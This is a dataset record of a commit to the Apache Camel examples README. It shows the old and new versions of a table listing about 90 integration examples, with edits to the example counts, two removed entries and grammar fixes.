mgyongyosi\/camel,davidkarlsen\/camel,pkletsko\/camel,curso007\/camel,jonmcewen\/camel,anoordover\/camel,mgyongyosi\/camel,christophd\/camel,pax95\/camel,gnodet\/camel,pax95\/camel,christophd\/camel,christophd\/camel,salikjan\/camel,punkhorn\/camel-upstream,Fabryprog\/camel,adessaigne\/camel,dmvolod\/camel,punkhorn\/camel-upstream,gautric\/camel,davidkarlsen\/camel,dmvolod\/camel,tadayosi\/camel,prashant2402\/camel,pax95\/camel,sverkera\/camel,rmarting\/camel,jonmcewen\/camel,akhettar\/camel,mgyongyosi\/camel,gnodet\/camel,isavin\/camel,kevinearls\/camel,objectiser\/camel,scranton\/camel,Thopap\/camel,mgyongyosi\/camel,prashant2402\/camel,punkhorn\/camel-upstream,nboukhed\/camel,kevinearls\/camel,pmoerenhout\/camel,pax95\/camel,akhettar\/camel,cunningt\/camel,cunningt\/camel,nboukhed\/camel,adessaigne\/camel,dmvolod\/camel,mgyongyosi\/camel,anoordover\/camel,kevinearls\/camel,CodeSmell\/camel,christophd\/camel,DariusX\/camel,pkletsko\/camel,cunningt\/camel,snurmine\/camel,yuruki\/camel,isavin\/camel,anton-k11\/camel","old_file":"examples\/README.adoc","new_file":"examples\/README.adoc","new_contents":"# Welcome to the Apache Camel Examples\n\n### Introduction\n\nThis directory contains the various examples for working with Apache\nCamel. The examples can be run using Maven. 
When using the Maven\ncommand, Maven will attempt to download the required dependencies from a\ncentral repository to your local repository.\nView the individual example READMEs for details.\n\n### Examples\n\n\/\/ examples: START\nNumber of Examples: 90 (9 deprecated)\n\n[width=\"100%\",cols=\"4,2,4\",options=\"header\"]\n|=======================================================================\n| Example | Category | Description\n\n| link:camel-example-cdi\/README.md[CDI] (camel-example-cdi) | Beginner | An example showing how to work with Camel and CDI for dependency injection\n\n| link:camel-example-cdi-properties\/README.md[CDI Properties] (camel-example-cdi-properties) | Beginner | DeltaSpike configuration properties CDI example\n\n| link:camel-example-cdi-xml\/README.md[CDI Camel XML] (camel-example-cdi-xml) | Beginner | CDI and Camel XML example\n\n| link:camel-example-console\/README.md[Console] (camel-example-console) | Beginner | An example that reads input from the console\n\n| link:camel-example-ftp\/README.md[FTP] (camel-example-ftp) | Beginner | An example for showing Camel FTP integration\n\n| link:camel-example-java8\/readme.adoc[Java8] (camel-example-java8) | Beginner | An example for showing Camel DSL for Java 8\n\n| link:camel-example-pojo-messaging\/README.md[POJO Routing] (camel-example-pojo-messaging) | Beginner | An example showing how to produce and consume messages from Camel endpoints using annotated POJOs\n \n\n| link:camel-example-reload\/Readme.md[Reload] (camel-example-reload) | Beginner | An example that live reloads routes when the XML file is updated\n\n| link:camel-example-rest-swagger\/README.md[Rest Swagger] (camel-example-rest-swagger) | Beginner | This example shows how to call a REST service defined using Swagger specification\n\n| link:camel-example-servlet-tomcat\/README.md[Servlet Tomcat] (camel-example-servlet-tomcat) | Beginner | An example using Camel Servlet with Apache Tomcat\n\n| link:camel-example-servlet-tomcat-no-spring\/README.md[Servlet Tomcat without Spring] (camel-example-servlet-tomcat-no-spring) | Beginner | An example using Camel Servlet with Apache Tomcat without using Spring\n\n| link:camel-example-spring\/README.md[Spring] (camel-example-spring) | Beginner | An example showing how to work with Camel and Spring\n\n| link:camel-example-spring-boot\/readme.adoc[Spring Boot] (camel-example-spring-boot) | Beginner | An example showing how to work with Camel and Spring Boot\n\n| link:camel-example-spring-boot-live-reload\/readme.adoc[Spring Boot Live Reload] (camel-example-spring-boot-live-reload) | Beginner | An example showing how to use the live reload feature of Spring Boot with Camel\n\n| link:camel-example-spring-javaconfig\/README.md[Spring Java Config] (camel-example-spring-javaconfig) | Beginner | An example showing how to work with Camel and Spring Java Config\n\n| link:camel-example-spring-xquery\/README.md[Spring XQuery] (camel-example-spring-xquery) | Beginner | An example using Spring XML to transform a message using XQuery\n\n| link:camel-example-widget-gadget-cdi\/README.md[Widget Gadget CDI] (camel-example-widget-gadget-cdi) | Beginner | The widget and gadget example from the EIP book\n\n| link:camel-example-widget-gadget-java\/README.md[Widget Gadget Java] (camel-example-widget-gadget-java) | Beginner | The widget and gadget example from the EIP book\n\n| link:camel-example-widget-gadget-xml\/README.md[Widget Gadget XML] (camel-example-widget-gadget-xml) | Beginner | The widget and gadget example from the EIP 
book\n\n| link:camel-example-cassandra-kubernetes\/ReadMe.md[Cassandra Kubernetes] (camel-example-cassandra-kubernetes) | Cloud | An example with Camel and Cassandra running on Kubernetes\n\n| link:camel-example-cdi-aws-s3\/README.md[CDI AWS S3] (camel-example-cdi-aws-s3) | Cloud | AWS S3 CDI example\n\n| link:camel-example-cdi-kubernetes\/README.md[CDI Kubernetes] (camel-example-cdi-kubernetes) | Cloud | An example running Camel CDI on Kubernetes\n\n| link:camel-example-hazelcast-kubernetes\/ReadMe.md[Hazelcast Kubernetes] (camel-example-hazelcast-kubernetes) | Cloud | An example with Camel and Hazelcast running on Kubernetes\n\n| link:camel-example-spring-boot-servicecall\/README.adoc[Spring Boot Servicecall] (camel-example-spring-boot-servicecall) | Cloud | An example showing how to work with Camel ServiceCall EIP and Spring Boot\n\n| link:camel-example-spring-cloud-servicecall\/README.adoc[Spring Cloud Servicecall] (camel-example-spring-cloud-servicecall) | Cloud | An example showing how to work with Camel ServiceCall EIP and Spring Cloud\n\n| link:camel-example-cdi-cassandraql\/README.md[CDI Cassandra] (camel-example-cdi-cassandraql) | Database | Cassandraql CDI example\n\n| link:camel-example-jdbc\/README.md[JDBC] (camel-example-jdbc) | Database | An example for showing Camel using JDBC component\n\n| link:camel-example-mybatis\/README.md[MyBatis] (camel-example-mybatis) | Database | An example for showing Camel using MyBatis SQL mapper component\n\n| link:camel-example-spring-boot-rest-jpa\/README.md[Spring Boot REST JPA] (camel-example-spring-boot-rest-jpa) | Database | An example demonstrating how to use Camel REST DSL with JPA to expose a RESTful API that performs CRUD operations on a database\n\n| link:camel-example-sql\/README.md[SQL] (camel-example-sql) | Database | An example for showing Camel using SQL component\n\n| link:camel-example-aggregate\/README.md[Aggregate] (camel-example-aggregate) | EIP | Demonstrates the persistent support for the Camel aggregator\n\n| link:camel-example-cafe\/README.md[Cafe] (camel-example-cafe) | EIP | A cafe example showing how to work with Camel\n\n| link:camel-example-etl\/README.md[ETL] (camel-example-etl) | EIP | An example showing how to use Camel as an Extract Transform and Load (ETL) tool\n\n| link:camel-example-hystrix\/README.md[Hystrix] (camel-example-hystrix) | EIP | An example showing how to use Hystrix EIP as circuit breaker in Camel routes\n\n| link:camel-example-loadbalancing\/README.md[Load Balancing] (camel-example-loadbalancing) | EIP | An example that demonstrates load balancing messaging with mina servers (TCP\/IP)\n\n| link:camel-example-loan-broker-cxf\/README.md[Loan Broker WebService] (camel-example-loan-broker-cxf) | EIP | An example that shows the EIP's loan broker demo\n\n| link:camel-example-loan-broker-jms\/README.md[Loan Broker JMS] (camel-example-loan-broker-jms) | EIP | An example that shows the EIP's loan broker demo using JMS\n\n| link:camel-example-route-throttling\/README.md[Route Throttling] (camel-example-route-throttling) | EIP | A client-server example using JMS transport where the server side can throttle the Camel\n route dynamically based on the flow of messages\n \n\n| link:camel-example-transformer-blueprint\/README.md[Transformer OSGi Blueprint] (camel-example-transformer-blueprint) | Input\/Output Type Contract | An example demonstrating declarative transformation along data type declaration using OSGi Blueprint XML\n\n| link:camel-example-transformer-cdi\/README.md[Transformer CDI] 
(camel-example-transformer-cdi) | Input\/Output Type Contract | An example demonstrating declarative transformation along data type declaration using Java DSL and CDI\n \n\n| link:camel-example-transformer-demo\/README.md[Transformer and Validator Spring XML] (camel-example-transformer-demo) | Input\/Output Type Contract | An example demonstrating declarative transformation and validation along data type declaration using Spring DSL\n\n| link:camel-example-validator-spring-boot\/readme.adoc[Validator Spring Boot] (camel-example-validator-spring-boot) | Input\/Output Type Contract | An example showing how to work with declarative validation and Spring Boot\n\n| link:camel-example-bam\/README.md[BAM (deprecated)] (camel-example-bam) | Management and Monitoring | *deprecated* An example showing how to use Camel as a Business Activity Monitoring tool\n\n| link:camel-example-cdi-metrics\/README.md[CDI Metrics] (camel-example-cdi-metrics) | Management and Monitoring | Dropwizard Metrics CDI example\n\n| link:camel-example-jmx\/README.md[JMX] (camel-example-jmx) | Management and Monitoring | An example showing how to work with Camel and JMX\n\n| link:camel-example-management\/README.md[Management] (camel-example-management) | Management and Monitoring | An example for showing Camel JMX management\n\n| link:camel-example-opentracing\/README.md[OpenTracing] (camel-example-opentracing) | Management and Monitoring | An example showing how to trace incoming and outgoing messages from Camel with OpenTracing\n\n| link:camel-example-splunk\/README.md[Splunk] (camel-example-splunk) | Management and Monitoring | An example using Splunk\n\n| link:camel-example-spring-boot-metrics\/README.md[Spring Boot Metrics] (camel-example-spring-boot-metrics) | Management and Monitoring | An example showing how to work with Camel and Spring Boot and report metrics to Graphite\n\n| link:camel-example-tracer\/README.md[Tracer] (camel-example-tracer) | Management and Monitoring | *deprecated* An example showing how to persist Camel trace event messages using JPA\n\n| link:camel-example-zipkin\/README.md[Zipkin] (camel-example-zipkin) | Management and Monitoring | An example showing how to trace incoming and outgoing messages from Camel with Zipkin\n\n| link:camel-example-activemq-tomcat\/README.md[ActiveMQ Tomcat] (camel-example-activemq-tomcat) | Messaging | An example using ActiveMQ Broker and Camel with Apache Tomcat\n\n| link:camel-example-guice-jms\/README.md[Guice JMS] (camel-example-guice-jms) | Messaging | *deprecated* An example showing how to work with Camel, Guice and JMS\n\n| link:camel-example-jms-file\/README.md[JMS-File] (camel-example-jms-file) | Messaging | An example that persists messages from JMS to files\n\n| link:camel-example-kafka\/README.adoc[Kafka] (camel-example-kafka) | Messaging | An example for Kafka\n\n| link:camel-example-spring-jms\/README.md[Spring JMS] (camel-example-spring-jms) | Messaging | An example using Spring XML to talk to the JMS server from different kinds of client techniques\n\n| link:camel-example-cdi-osgi\/README.md[CDI OSGi] (camel-example-cdi-osgi) | OSGi | *deprecated* PAX CDI example\n\n| link:camel-example-cxf-blueprint\/README.md[CXF Blueprint] (camel-example-cxf-blueprint) | OSGi | An example which uses a CXF consumer and the OSGI HTTP Service\n\n| link:camel-example-cxf-osgi\/README.md[CXF OSGi] (camel-example-cxf-osgi) | OSGi | An example which uses a CXF consumer and the OSGI HTTP Service\n\n| link:camel-example-netty-http\/README.md[Netty HTTP] 
(camel-example-netty-http) | OSGi | An example showing how to use a shared Netty HTTP server with multiple Camel applications in an OSGi container\n\n| link:camel-example-osgi-rmi\/README.md[OSGi RMI] (camel-example-osgi-rmi) | OSGi | *deprecated* An OSGi example which exposes an RMI service.\n\n| link:camel-example-servlet-rest-blueprint\/README.md[Servlet REST Blueprint] (camel-example-servlet-rest-blueprint) | OSGi | An example using Servlet REST with OSGi Blueprint\n\n| link:camel-example-sql-blueprint\/README.md[SQL Blueprint] (camel-example-sql-blueprint) | OSGi | An example for showing Camel using SQL component with blueprint\n\n| link:camel-example-ssh\/README.md[SSH] (camel-example-ssh) | OSGi | A simple SSH example which creates a bundle that can be dropped into any OSGi container\n\n| link:camel-example-ssh-security\/README.md[SSH Security] (camel-example-ssh-security) | OSGi | A Certificate secured SSH example that creates a bundle that can be dropped into any OSGi container\n \n\n| link:camel-example-swagger-osgi\/README.md[Swagger OSGi] (camel-example-swagger-osgi) | OSGi | An example using REST DSL in XML and Swagger API\n\n| link:camel-example-groovy\/ReadMe.md[Groovy] (camel-example-groovy) | Other Languages | *deprecated* A Camel route using Groovy DSL\n\n| link:camel-example-kotlin\/ReadMe.md[Kotlin] (camel-example-kotlin) | Other Languages | A Camel route using Kotlin\n\n| link:camel-example-scala\/ReadMe.md[Scala] (camel-example-scala) | Other Languages | *deprecated* A Camel route using Scala\n\n| link:camel-example-java8-rx\/readme.adoc[Java8 RX] (camel-example-java8-rx) | Reactive | An example for showing Camel RX for Java 8\n\n| link:camel-example-reactive-streams\/readme.adoc[Reactive Streams] (camel-example-reactive-streams) | Reactive | An example that shows how Camel can exchange data using reactive streams with Spring Boot reactor\n\n| link:camel-example-cdi-rest-servlet\/README.md[CDI Rest] (camel-example-cdi-rest-servlet) | Rest | REST DSL \/ Servlet with CDI example\n\n| link:camel-example-rest-producer\/readme.adoc[Rest Producer] (camel-example-rest-producer) | Rest | An example showing how to use Camel Rest to call a REST service\n\n| link:camel-example-restlet-jdbc\/README.md[Restlet JDBC] (camel-example-restlet-jdbc) | Rest | An example showing how to create REST API with Camel Restlet and JDBC components\n\n| link:camel-example-spark-rest\/README.md[Spark REST] (camel-example-spark-rest) | Rest | An example using Spark REST\n\n| link:camel-example-spring-boot-rest-swagger\/README.adoc[Spring Boot Rest Swagger] (camel-example-spring-boot-rest-swagger) | Rest | An example showing Camel REST DSL and Swagger with Spring Boot\n\n| link:camel-example-swagger-cdi\/README.md[Swagger CDI] (camel-example-swagger-cdi) | Rest | An example using REST DSL and Swagger Java with CDI\n\n| link:camel-example-swagger-xml\/README.md[Swagger XML] (camel-example-swagger-xml) | Rest | An example using REST DSL in XML and Swagger with Swagger UI (web console)\n\n| link:camel-example-spring-security\/README.md[Spring Security] (camel-example-spring-security) | Security | An example showing how to work with Camel and Spring Security\n\n| link:camel-example-simplejirabot\/README.md[JIRA Bot] (camel-example-simplejirabot) | Social | An example showing how to work with RSS and IRC endpoints\n\n| link:camel-example-twitter-salesforce\/README.md[Twitter Salesforce] (camel-example-twitter-salesforce) | Social | Twitter mentions are created as contacts in Salesforce\n\n| 
link:camel-example-twitter-websocket\/README.md[Twitter Websocket] (camel-example-twitter-websocket) | Social | An example that pushes new tweets to a web page using web-socket\n\n| link:camel-example-twitter-websocket-blueprint\/README.md[Twitter Websocket Blueprint] (camel-example-twitter-websocket-blueprint) | Social | An example that pushes new tweets to a web page using web-socket\n\n| link:camel-example-cdi-test\/README.md[CDI Test] (camel-example-cdi-test) | Testing | An example illustrating Camel CDI testing features\n\n| link:camel-example-reportincident\/README.md[Report Incident] (camel-example-reportincident) | Tutorial | *deprecated* An example based on a real-life use case for reporting incidents using a webservice that are transformed\n and sent as emails to a backing system\n \n\n| link:camel-example-reportincident-wssecurity\/README.md[Report Incident WS-Security] (camel-example-reportincident-wssecurity) | Tutorial | *deprecated* An example based on a real-life use case for reporting incidents using a webservice that are transformed\n and sent as emails to a backing system. The client calling the WebService is authenticated through WS-Security\n \n\n| link:camel-example-cxf\/README.md[CXF] (camel-example-cxf) | WebService | An example which demonstrates the use of the Camel CXF component\n\n| link:camel-example-cxf-proxy\/README.md[CXF Proxy] (camel-example-cxf-proxy) | WebService | An example which uses Camel to proxy a web service\n\n| link:camel-example-cxf-tomcat\/README.md[CXF Tomcat] (camel-example-cxf-tomcat) | WebService | An example using Camel CXF (code first) with Apache Tomcat\n\n| link:camel-example-spring-ws\/README.md[Spring WebService] (camel-example-spring-ws) | WebService | An example showing how to work with Camel and Spring Web Services\n|=======================================================================\n\/\/ examples: END\n\n\n### Forum, Help, etc\n\nIf you hit any problems please let us know on the Camel Forums <http:\/\/camel.apache.org\/discussion-forums.html>\n\nPlease help us make Apache Camel better - we appreciate any feedback you may\nhave. Enjoy!\n\nThe Camel riders!\n","old_contents":"# Welcome to the Apache Camel Examples\n\n### Introduction\n\nThis directory contains the various examples for working with Apache\nCamel. The examples can be run using Maven. 
When using the Maven\ncommand, Maven will attempt to download the required dependencies from a\ncentral repository to your local repository.\nView the individual example READMEs for details.\n\n### Examples\n\n\/\/ examples: START\nNumber of Examples: 92 (10 deprecated)\n\n[width=\"100%\",cols=\"4,2,4\",options=\"header\"]\n|=======================================================================\n| Example | Category | Description\n\n| link:camel-example-cdi\/README.md[CDI] (camel-example-cdi) | Beginner | An example showing how to work with Camel and CDI for dependency injection\n\n| link:camel-example-cdi-properties\/README.md[CDI Properties] (camel-example-cdi-properties) | Beginner | DeltaSpike configuration properties CDI example\n\n| link:camel-example-cdi-xml\/README.md[CDI Camel XML] (camel-example-cdi-xml) | Beginner | CDI and Camel XML example\n\n| link:camel-example-console\/README.md[Console] (camel-example-console) | Beginner | An example that reads input from the console\n\n| link:camel-example-ftp\/README.md[FTP] (camel-example-ftp) | Beginner | An example for showing Camel FTP integration\n\n| link:camel-example-java8\/readme.adoc[Java8] (camel-example-java8) | Beginner | An example for showing Camel DSL for Java 8\n\n| link:camel-example-pojo-messaging\/README.md[POJO Routing] (camel-example-pojo-messaging) | Beginner | An example showing how to produce and consume messages from Camel endpoints using annotated POJOs\n \n\n| link:camel-example-reload\/Readme.md[Reload] (camel-example-reload) | Beginner | An example that live reloads routes when the XML file is updated\n\n| link:camel-example-rest-swagger\/README.md[Rest Swagger] (camel-example-rest-swagger) | Beginner | This example shows how to call a REST service defined using Swagger specification\n\n| link:camel-example-servlet-tomcat\/README.md[Servlet Tomcat] (camel-example-servlet-tomcat) | Beginner | An example using Camel Servlet with Apache Tomcat\n\n| link:camel-example-servlet-tomcat-no-spring\/README.md[Servlet Tomcat without Spring] (camel-example-servlet-tomcat-no-spring) | Beginner | An example using Camel Servlet with Apache Tomcat without using Spring\n\n| link:camel-example-spring\/README.md[Spring] (camel-example-spring) | Beginner | An example showing how to work with Camel and Spring\n\n| link:camel-example-spring-boot\/readme.adoc[Spring Boot] (camel-example-spring-boot) | Beginner | An example showing how to work with Camel and Spring Boot\n\n| link:camel-example-spring-boot-live-reload\/readme.adoc[Spring Boot Live Reload] (camel-example-spring-boot-live-reload) | Beginner | An example showing how to use the live reload feature of Spring Boot with Camel\n\n| link:camel-example-spring-javaconfig\/README.md[Spring Java Config] (camel-example-spring-javaconfig) | Beginner | An example showing how to work with Camel and Spring Java Config\n\n| link:camel-example-spring-xquery\/README.md[Spring XQuery] (camel-example-spring-xquery) | Beginner | An example using Spring XML to transform a message using XQuery\n\n| link:camel-example-widget-gadget-cdi\/README.md[Widget Gadget CDI] (camel-example-widget-gadget-cdi) | Beginner | The widget and gadget example from the EIP book\n\n| link:camel-example-widget-gadget-java\/README.md[Widget Gadget Java] (camel-example-widget-gadget-java) | Beginner | The widget and gadget example from the EIP book\n\n| link:camel-example-widget-gadget-xml\/README.md[Widget Gadget XML] (camel-example-widget-gadget-xml) | Beginner | The widget and gadget example from the EIP 
book\n\n| link:camel-example-cassandra-kubernetes\/ReadMe.md[Cassandra Kubernetes] (camel-example-cassandra-kubernetes) | Cloud | An example with Camel and Cassandra running on Kubernetes\n\n| link:camel-example-cdi-aws-s3\/README.md[CDI AWS S3] (camel-example-cdi-aws-s3) | Cloud | AWS S3 CDI example\n\n| link:camel-example-cdi-kubernetes\/README.md[CDI Kubernetes] (camel-example-cdi-kubernetes) | Cloud | An example running Camel CDI on Kubernetes\n\n| link:camel-example-hazelcast-kubernetes\/ReadMe.md[Hazelcast Kubernetes] (camel-example-hazelcast-kubernetes) | Cloud | An example with Camel and Hazelcast running on Kubernetes\n\n| link:camel-example-spring-boot-servicecall\/README.adoc[Spring Boot Servicecall] (camel-example-spring-boot-servicecall) | Cloud | An example showing how to work with Camel ServiceCall EIP and Spring Boot\n\n| link:camel-example-spring-cloud-servicecall\/README.adoc[Spring Cloud Servicecall] (camel-example-spring-cloud-servicecall) | Cloud | An example showing how to work with Camel ServiceCall EIP and Spring Cloud\n\n| link:camel-example-cdi-cassandraql\/README.md[CDI Cassandra] (camel-example-cdi-cassandraql) | Database | Cassandraql CDI example\n\n| link:camel-example-jdbc\/README.md[JDBC] (camel-example-jdbc) | Database | An example for showing Camel using JDBC component\n\n| link:camel-example-mybatis\/README.md[MyBatis] (camel-example-mybatis) | Database | An example for showing Camel using MyBatis SQL mapper component\n\n| link:camel-example-spring-boot-rest-jpa\/README.md[Spring Boot REST JPA] (camel-example-spring-boot-rest-jpa) | Database | An example demonstrating how to use Camel REST DSL with JPA to expose a RESTful API that performs CRUD operations on a database\n\n| link:camel-example-sql\/README.md[SQL] (camel-example-sql) | Database | An example for showing Camel using SQL component\n\n| link:camel-example-aggregate\/README.md[Aggregate] (camel-example-aggregate) | EIP | Demonstrates the persistent support for the Camel aggregator\n\n| link:camel-example-cafe\/README.md[Cafe] (camel-example-cafe) | EIP | A cafe example showing how to work with Camel\n\n| link:camel-example-etl\/README.md[ETL] (camel-example-etl) | EIP | An example showing how to use Camel as an Extract Transform and Load (ETL) tool\n\n| link:camel-example-hystrix\/README.md[Hystrix] (camel-example-hystrix) | EIP | An example showing how to use Hystrix EIP as circuit breaker in Camel routes\n\n| link:camel-example-loadbalancing\/README.md[Load Balancing] (camel-example-loadbalancing) | EIP | An example that demonstrate load balancing messaging with mina servers (TCP\/IP)\n\n| link:camel-example-loan-broker-cxf\/README.md[Loan Broker WebService] (camel-example-loan-broker-cxf) | EIP | An example that shows the EIP's loan broker demo\n\n| link:camel-example-loan-broker-jms\/README.md[Loan Broker JMS] (camel-example-loan-broker-jms) | EIP | An example that shows the EIP's loan broker demo using JMS\n\n| link:camel-example-route-throttling\/README.md[Route Throttling] (camel-example-route-throttling) | EIP | A client-server example using JMS transport where we on the server side can throttle the Camel\n route dynamically based on the flow of messages\n \n\n| link:camel-example-transformer-blueprint\/README.md[Transformer OSGi Blueprint] (camel-example-transformer-blueprint) | Input\/Output Type Contract | An example demonstrating declarative transformation along data type declaration using OSGi Blueprint XML\n\n| link:camel-example-transformer-cdi\/README.md[Transformer CDI] 
(camel-example-transformer-cdi) | Input\/Output Type Contract | An example demonstrating declarative transformation along data type declaration using Java DSL and CDI\n \n\n| link:camel-example-transformer-demo\/README.md[Transformer and Validator Spring XML] (camel-example-transformer-demo) | Input\/Output Type Contract | An example demonstrating declarative transformation and validation along data type declaration using Spring DSL\n\n| link:camel-example-validator-spring-boot\/readme.adoc[Validator Spring Boot] (camel-example-validator-spring-boot) | Input\/Output Type Contract | An example showing how to work with declarative validation and Spring Boot\n\n| link:camel-example-bam\/README.md[BAM (deprecated)] (camel-example-bam) | Management and Monitoring | *deprecated* An example showing how to use Camel as a Business Activity Monitoring tool\n\n| link:camel-example-cdi-metrics\/README.md[CDI Metrics] (camel-example-cdi-metrics) | Management and Monitoring | Dropwizard Metrics CDI example\n\n| link:camel-example-jmx\/README.md[JMX] (camel-example-jmx) | Management and Monitoring | An example showing how to work with Camel and JMX\n\n| link:camel-example-management\/README.md[Management] (camel-example-management) | Management and Monitoring | An example for showing Camel JMX management\n\n| link:camel-example-opentracing\/README.md[OpenTracing] (camel-example-opentracing) | Management and Monitoring | An example showing how to trace incoming and outgoing messages from Camel with OpenTracing\n\n| link:camel-example-splunk\/README.md[Splunk] (camel-example-splunk) | Management and Monitoring | An example using Splunk\n\n| link:camel-example-spring-boot-metrics\/README.md[Spring Boot Metrics] (camel-example-spring-boot-metrics) | Management and Monitoring | An example showing how to work with Camel and Spring Boot and report metrics to Graphite\n\n| link:camel-example-tracer\/README.md[Tracer] (camel-example-tracer) | Management and Monitoring | *deprecated* An example showing how to persist Camel trace event messages using JPA\n\n| link:camel-example-zipkin\/README.md[Zipkin] (camel-example-zipkin) | Management and Monitoring | An example showing how to trace incoming and outgoing messages from Camel with Zipkin\n\n| link:camel-example-activemq-tomcat\/README.md[ActiveMQ Tomcat] (camel-example-activemq-tomcat) | Messaging | An example using ActiveMQ Broker and Camel with Apache Tomcat\n\n| link:camel-example-guice-jms\/README.md[Guice JMS] (camel-example-guice-jms) | Messaging | *deprecated* An example showing how to work with Camel, Guice and JMS\n\n| link:camel-example-jms-file\/README.md[JMS-File] (camel-example-jms-file) | Messaging | An example that persists messages from JMS to files\n\n| link:camel-example-kafka\/README.adoc[Kafka] (camel-example-kafka) | Messaging | An example for Kafka\n\n| link:camel-example-spring-jms\/README.md[Spring JMS] (camel-example-spring-jms) | Messaging | An example using Spring XML to talk to the JMS server from different kind of client techniques\n\n| link:camel-example-box-osgi\/README.md[Box OSGi] (camel-example-box-osgi) | OSGi | An example which use a Box Endpoint in OSGi\n\n| link:camel-example-cdi-osgi\/README.md[CDI OSGi] (camel-example-cdi-osgi) | OSGi | *deprecated* PAX CDI example\n\n| link:camel-example-cxf-blueprint\/README.md[CXF Blueprint] (camel-example-cxf-blueprint) | OSGi | An example which use a CXF consumer and the OSGI HTTP Service\n\n| link:camel-example-cxf-osgi\/README.md[CXF OSGi] (camel-example-cxf-osgi) | OSGi | An example 
which use a CXF consumer and the OSGI HTTP Service\n\n| link:camel-example-netty-http\/README.md[Netty HTTP] (camel-example-netty-http) | OSGi | An example showing how to use a shared Netty HTTP server with multiple Camel applications in OSGi container\n\n| link:camel-example-osgi-rmi\/README.md[OSGi RMI] (camel-example-osgi-rmi) | OSGi | *deprecated* A OSGi example which exposes a RMI service.\n\n| link:camel-example-servlet-rest-blueprint\/README.md[Servlet REST Blueprint] (camel-example-servlet-rest-blueprint) | OSGi | An example using Servlet REST with OSGi Blueprint\n\n| link:camel-example-spring-dm\/README.md[Spring DM] (camel-example-spring-dm) | OSGi | *deprecated* A simple OSGi Spring DM example which creates a bundle that can be dropped into any OSGi container\n\n| link:camel-example-sql-blueprint\/README.md[SQL Blueprint] (camel-example-sql-blueprint) | OSGi | An example for showing Camel using SQL component with blueprint\n\n| link:camel-example-ssh\/README.md[SSH] (camel-example-ssh) | OSGi | A simple SSH example which creates a bundle that can be dropped into any OSGi container\n\n| link:camel-example-ssh-security\/README.md[SSH Security] (camel-example-ssh-security) | OSGi | A Certificate secured SSH example that creates a bundle that can be dropped into any OSGi container\n \n\n| link:camel-example-swagger-osgi\/README.md[Swagger OSGi] (camel-example-swagger-osgi) | OSGi | An example using REST DSL in XML and Swagger API\n\n| link:camel-example-groovy\/ReadMe.md[Groovy] (camel-example-groovy) | Other Languages | *deprecated* A Camel route using Groovy DSL\n\n| link:camel-example-kotlin\/ReadMe.md[Kotlin] (camel-example-kotlin) | Other Languages | A Camel route using Kotlin\n\n| link:camel-example-scala\/ReadMe.md[Scala] (camel-example-scala) | Other Languages | *deprecated* A Camel route using Scala\n\n| link:camel-example-java8-rx\/readme.adoc[Java8 RX] (camel-example-java8-rx) | Reactive | An example for showing Camel RX for Java 8\n\n| link:camel-example-reactive-streams\/readme.adoc[Reactive Streams] (camel-example-reactive-streams) | Reactive | An example that shows how Camel can exchange data using reactive streams with Spring Boot reactor\n\n| link:camel-example-cdi-rest-servlet\/README.md[CDI Rest] (camel-example-cdi-rest-servlet) | Rest | REST DSL \/ Servlet with CDI example\n\n| link:camel-example-rest-producer\/readme.adoc[Rest Producer] (camel-example-rest-producer) | Rest | An example showing how to use Camel Rest to call a REST service\n\n| link:camel-example-restlet-jdbc\/README.md[Restlet JDBC] (camel-example-restlet-jdbc) | Rest | An example showing how to create REST API with Camel Restlet and JDBC components\n\n| link:camel-example-spark-rest\/README.md[Spark REST] (camel-example-spark-rest) | Rest | An example using Spark REST\n\n| link:camel-example-spring-boot-rest-swagger\/README.adoc[Spring Boot Rest Swagger] (camel-example-spring-boot-rest-swagger) | Rest | An example showing Camel REST DSL and Swagger with Spring Boot\n\n| link:camel-example-swagger-cdi\/README.md[Swagger CDI] (camel-example-swagger-cdi) | Rest | An example using REST DSL and Swagger Java with CDI\n\n| link:camel-example-swagger-xml\/README.md[Swagger XML] (camel-example-swagger-xml) | Rest | An example using REST DSL in XML and Swagger with Swagger UI (web console)\n\n| link:camel-example-spring-security\/README.md[Spring Security] (camel-example-spring-security) | Security | An example showing how to work with Camel and Spring Security\n\n| 
link:camel-example-simplejirabot\/README.md[JIRA Bot] (camel-example-simplejirabot) | Social | An example showing how to work with RSS and IRC endpoints\n\n| link:camel-example-twitter-salesforce\/README.md[Twitter Salesforce] (camel-example-twitter-salesforce) | Social | Twitter mentions is created as contacts in Salesforce\n\n| link:camel-example-twitter-websocket\/README.md[Twitter Websocket] (camel-example-twitter-websocket) | Social | An example that pushes new tweets to a web page using web-socket\n\n| link:camel-example-twitter-websocket-blueprint\/README.md[Twitter Websocket Blueprint] (camel-example-twitter-websocket-blueprint) | Social | An example that pushes new tweets to a web page using web-socket\n\n| link:camel-example-cdi-test\/README.md[CDI Test] (camel-example-cdi-test) | Testing | An example illustrating Camel CDI testing features\n\n| link:camel-example-reportincident\/README.md[Report Incident] (camel-example-reportincident) | Tutorial | *deprecated* An example based on real life use case for reporting incidents using webservice that are transformed\n and send as emails to a backing system\n \n\n| link:camel-example-reportincident-wssecurity\/README.md[Report Incident WS-Security] (camel-example-reportincident-wssecurity) | Tutorial | *deprecated* An example based on real life use case for reporting incidents using webservice that are transformed\n and send as emails to a backing system. Client calling the WebService is authentified through WS-Security\n \n\n| link:camel-example-cxf\/README.md[CXF] (camel-example-cxf) | WebService | An example which demonstrates the use of the Camel CXF component\n\n| link:camel-example-cxf-proxy\/README.md[CXF Proxy] (camel-example-cxf-proxy) | WebService | An example which uses Camel to proxy a web service\n\n| link:camel-example-cxf-tomcat\/README.md[CXF Tomcat] (camel-example-cxf-tomcat) | WebService | An example using Camel CXF (code first) with Apache Tomcat\n\n| link:camel-example-spring-ws\/README.md[Spring WebService] (camel-example-spring-ws) | WebService | An example showing how to work with Camel and Spring Web Services\n|=======================================================================\n\/\/ examples: END\n\n\n### Forum, Help, etc\n\nIf you hit an problems please let us know on the Camel Forums <http:\/\/camel.apache.org\/discussion-forums.html>\n\nPlease help us make Apache Camel better - we appreciate any feedback you may\nhave. 
